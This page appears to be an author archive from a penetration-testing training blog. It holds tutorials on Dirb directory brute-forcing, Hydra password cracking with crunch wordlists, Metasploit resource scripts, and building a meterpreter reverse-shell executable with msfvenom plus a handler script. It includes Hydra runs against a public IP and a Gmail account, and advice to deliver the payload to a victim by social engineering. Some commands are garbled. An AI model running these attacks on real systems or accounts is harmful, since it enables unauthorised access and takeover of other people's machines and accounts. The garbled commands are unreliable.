Ruben Dario Caravajal Herrera

Posts by Ruben Dario Caravajal Herrera

Dirb is a web content scanner

Dirb is a web content scanner, it’s principal features are scanning and attacking folder that is hidden within websites, Dirb makes this possible using dictionary based attacks against the servers mostly HTTP requests.

Dirb comes with default wordlists to easy the process of the attacks, the main purpose of Dirb is to be used in web application auditing, it helps the professional’s to test the security parameters included to protect websites, Dirb occasionally coves some holes that are not covered by the classic tools used to scan website vulnerabilities, the reason is that Dirb looks for specific objects located on the website. it doesn’t look for general vulnerabilities, it’s purpose is to look for web content that can be vulnerable.

How Dirb works:

Dirb has an internal wordlist file that by default has around 4000 words for brute force attacks. There are also a lot more updated wordlists available over the internet that can be used as well. Dirb makes a search of the words in its wordlist in each directory or object of a server or a website. It might be an admin panel or a subdirectory that is vulnerable to attack. The most fundamental thing is to find the objects as they are hidden.

How to acquire it?

Download Dirb via Sourceforge: https://sourceforge.net/projects/dirb/

Using Dirb:

First, you need to download Dirb.

To uncompress the compressed Dirb file, you can use the next command:

sudo tar -xvzf dirb222.tar.gz

The Dirb folder is now uncompressed, and you can see it with ls command:

Go to the dirb directory and make executable configure with next command:

chmod u+x configure

Run configure and then type make:

Dirb is now installed, and you can use it with next command:

./dirb URL

Testing for Special Vulnerable list:

Dirb can be used to test for specific vulnerable objects within particular types of web technologies. Every web technology has its unique vulnerabilities. They are NOT all the same. Dirb can help one search for specific vulnerable objects specific to the particular technology. Also, we should mention that these tests are often performed over the TCP ports that handled the web services, these ports are:

  • TCP/80 – HTTP
  • TCP/443 – HTTPs, SSL

Also by the time of an attack, these ports must be opened to host the web services so the firewalls cannot do much about it to prevent attacks directed to these ports.

Dirb has specific wordlists to search for these vulnerable often hidden objects. You can find them at:

cd  wordlists/vulns

Then list the contents of that directory:

ls -l

There are some files listed for each of the specific vulnerabilities to test. If your web server is Apache and you want to test it use apache.txt

To run

./dirb http://webscantest.com  wordlists/vulns/apache.txt

Hydra

Hydra is a password cracking tool that is supported only on Linux systems. The tool comes as a pre-installed feature on Kali Linux and Parrot versions. The installation process is very simple it only requires the utilization of a command to get the installation. In case that hydra doesn’t show up as a pre-installed gadget is necessary to use the following command which assures the installation of hydra in our machine:

Installing Hydra:

The installation process of Hydra is quite simple, it can be performed with the following command, that will install all the necessary packets that will be required to use hydra.

apt-get install hydra

Hydra Options:

The syntax handled by the tool is simple it calls the name of the tool followed by options, host and the service where it’s going to be directed as is shown in the example below:

hydra (options) host (service)

The main functions of hydra  are mostly focused on the utilization of two flags:

  • – l: Which can be used for the representation of the users selected to look for
  • -P: Which represents the password list that is going to be used as a dictionary to perform the attack

These two flags call a specific file that is going to be used as a guide to direct the attacks, an example of the syntax can be seen on the sentence shown below:

hydra -l user1 -P wordlist.txt smb 

The declaration of the service can be avoided from the syntax but it may help the cracking process if we require the information seeking process on a specific file. It may also be useful to be specific on the folders that contain the file that we want to crack so it will ease the process.

Creating your own wordlist:

The generation of wordlist to serve as a dictionary for the attack can be accomplished using a program called crunch, which generates several combinations of letters and numbers depending on the options you use for its configuration. This process is essential for the attacking process because it will serve as the key to the attack, testing different wordlist will improve the capacity of the brute-force attack.

Crunch installation process:

The process of installation for crunch can be performed by typing the following command:

sudo apt-get install crunch

After the process is finished we can use crunch to generate our text file or insert the character into another program, an example of this can be visualized on the picture shown below:

After the process is finished we can look for the file into the folder we have selected:

Testing Hydra:

Now we have explained the different characteristics involving hydra, we are going to show a few examples of attacks over servers using hydra, The first is an attack over an FTP server, once we have created the wordlist and we possess the IP address assigned to the server. The attack can look like this:

As can be seen on the picture above, we managed to get the password for one of the users configured on the FTP server.  On the example below, we repeat the process over an SMB service with the same results.

hydra -l user1 -P wordlist.txt smb://45.76.60.202 

Other methodologies:

The next step is directed to the possibility to crack the password of an email account. Usually, the email services are referred to an SMPT service. The SMPT services are where the email services are handled. Using hydra we can specify the port where this service handles the email as is showed using hydra to direct the attack to the port 565 of smtp.gmail.com.server which will serve as an example for the following command:

hydra -l jdoe@gmail.com -P /root/Desktop/wordlist.txt -S 565 smtp.gmail.com smtp 

The last Hydra flag that is going to be presented is the (-x) flag. At times, a user can possess a ridiculously long and complicated password that direct attacks cannot crack, however, there’s one method that all passwords fall victim to, brute-force attacks. In a brute-force attack, every combination is used to determine the password. The CPU processor determines the speed, but in the long run, the password will be cracked. Here’s how the brute force option is invoked in hydra:

hydra -l John Doe -x Shortest length: longest length: combinations host

All, but the latter are executable by use of a software called THC-Hydra (Hydra).

Final Considerations:

Passwords are indeed the most commonly used mode of authentication. Of course, the attacks could be directed to exploit the system itself but as personal experience, it is much easier to hack a specific account that is password protected or is located on a server.

This can compromise the whole system itself. There is a wide range of methods that can be applied to crack passwords.  Another tool that can be used to fulfill this purpose is John the ripper which resembles the scope of Hydra but focused on the test the integrity of passwords. However, the ones discussed previously include Bruteforce, Dictionary, and direct attacks on the people (Phishing, Social Engineering and users lack of knowledge). All, but the latter are executable by use of a software called THC-Hydra (Hydra). Hydra can be merged with a tool called Nessus which is used for vulnerability scanning and often calls Hydra to complete the process. Below is an example video of hydra used to perform different attacks:

 

Creating a simple resource script to be used with Metasploit.

As penetration testers or if you just performing a simple or regular scan, we all know that the tasks can become a repetitive process (e. g. if you are performing a pentest in a streamlined environment). Typing, again and again, the Metasploit commands and making minor changes to perform an attack in the target can get a bit tiresome, but not to worry, here is where resource scripts can be very useful and be used on Metasploit to automate the repetitive tasks at hand.

They are essentially batch scripts and contain a set of commands that are automatically and sequentially executed when you load this resource scripts in Metasploit. A resource script can be created by chaining together a series of console Metasploit commands, mainly used for scanning purposes, and you can even directly embed Ruby to do things like call APIs, interact with objects in the database, and iterate actions.

We are going to create a simple resource script as an example, that will automate, the auxiliary scanning in an ftp service and will inform us what version of ftp service, the target is currently running.

The commands are basically the same that you are accustomed to using in Metasploit with the adding of the automation process.

You can create the script in any text editor you feel comfortable with.

We’ll create the script by typing Metasploit commands (the commands are the same regarding structure) but the commands will be executed unsequentially.

The first command we’ll use is the following:

msfconsole
use auxiliary/scanner/ftp/ftp_version

This will execute the scanning process and will tell us what ftp version is running in the target, as we have said before.

The next command will be to “see” what options you want to execute in the Pentest using the script you’ll be creating.

msf > use auxiliary/scanner/ftp/ftp_version
msf auxiliary (scanner/ftp/ftp_version) options

As a result, you will see the options available for the ftp service. For this example, the most important aspects are the RHOST, the threads in it, and to select the appropriate range of machines (target).

So for the script, we can do the following:

use auxiliary/scanner/ftp/ftp_version
set RHOSTS 192.168.100.4 [target host]
set THREADS 10 [number of threads]

The threads are dependant on the scale of the network, so, if you are scanning a large networks, you have to increase the amount of threads you want to use.

Now there’s something to be considered about this. and is the fact that you can change this values “on the fly”, therefore, you don’t have to type into the metasploit console the commands again and again if you want to change the options you want to explore, you can change it in the script and they can be executed remotely.

And now we just execute the command, or if you you are using an exploit module; exploit, but as this is a simple resource script we can do the following:

use auxiliary/scanner/ftp/ftp_version
set RHOSTS 192.168.1.103
set THREADS 10
run

We save this text file as  

vim ftp_scanner.rc

use auxiliary/scanner/ftp/ftp_version
set RHOSTS 192.168.100.4
set THREADS 10
run

esc
:
w


Where the extension .rc means resource script. Now we locate the script to be run in Metasploit. In there you type:

cd (location of the script you just created)

You have to make sure that your Metasploit post-rescue database is built and is already running. So now we can perform the Pentest of the ftp service by running this script, to look for threads in the RHOST of the target host

In Metasploit we type

msfconsole -r ftp_scanner.rc


This will start the Metasploit Framework and launch the created resource script.

Advantages of the Resource Scripts

And now the interesting this about this procedure is that after performing the scanning and getting the results assorted and ready for you to assess the information you just obtained if you want to change the IP or increase the threads you just have to edit the script and run it again.

Resource scripts versatility lies in their ability to take advantage of many of the capabilities that are available in Metasploit and Ruby, whether you are using them from the Metasploit console or from the Metasploit web interface.

The community of The Metasploit Framework has made available many resource scripts, so if you are a framework user, you can go to.

Here at Infosec Addicts in our courses Pentesting Candidate program and Ultimate Hacklab, you can get more information about the creation of this useful tools to facilitate the performing of any audit procedures or Pentest, using Metasploit. We hope sincerely that you can join us in this quest, of finding the best and more reliable solutions to be able to perform a Pentest in a throughout and reliable way for you.

 

 

Data-mining a compromised host

In this blog, we are going to take a file that can be .txt .doc .exe and we inject a payload to it, later we will verify which antivirus it detects, and finally, we will be able this file in the victim, and we will observe what happens.

what is a payload?

We can say that a payload is something harmful that is activated when executing any malware, in addition to raising privileges, it takes full advantage of the vulnerabilities found, in essence, the Payload is the part of the malicious code within the exploit, in charge of exploiting and exploiting this vulnerability to the maximum.

Installing tools in ubuntu and Debian

It does not emphasize the installation of Metasploit, but we will do a little review, so you know what it is about.

We open a Linux terminal and copies and paste the following command:

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

The result of the command will be the following:

In case you have some error with the installation in this link https://www.metasploit.com/ you find the necessary documentation to perform the installation

To create a payload we have a lot of tools, a significant one is Metasploit; we will generate a payload to attack Windows 7.

msfvenom -a x86 –platform windows -p windows / meterpreter / reverse_tcp LHOST = 192.168.100.3 -b “\ x00” -f exe -o Meterpreter.exe

This is the file that we have created and that we will put on the victim machine.

touch meterpreter.rc
echo use exploit/multi/handler >> meterpreter.rc
echo set PAYLOAD windows/meterpreter/reverse_tcp >> meterpreter.rc
echo set LHOST 192.168.100.3 >> meterpreter.rc
echo set ExitOnSession false >> meterpreter.rc
echo exploit -j -z >> meterpreter.rc
cat meterpreter.rc

msfconsole -r meterpreter.rc

To put the payload on the victim’s machine, you can use social engineering or any other way. In this case, we will upload it with a meterpreter session to make it faster.

The following image shows the file on the Windows 7 machine.

This would be the result of the attack

Checking the victim’s network settings

This is another command with which we can do tests, this serves to show a list of files and directories.

A session of meterpreter as a shell of windows you have a large amount of commands that are very useful at the time of making an attack.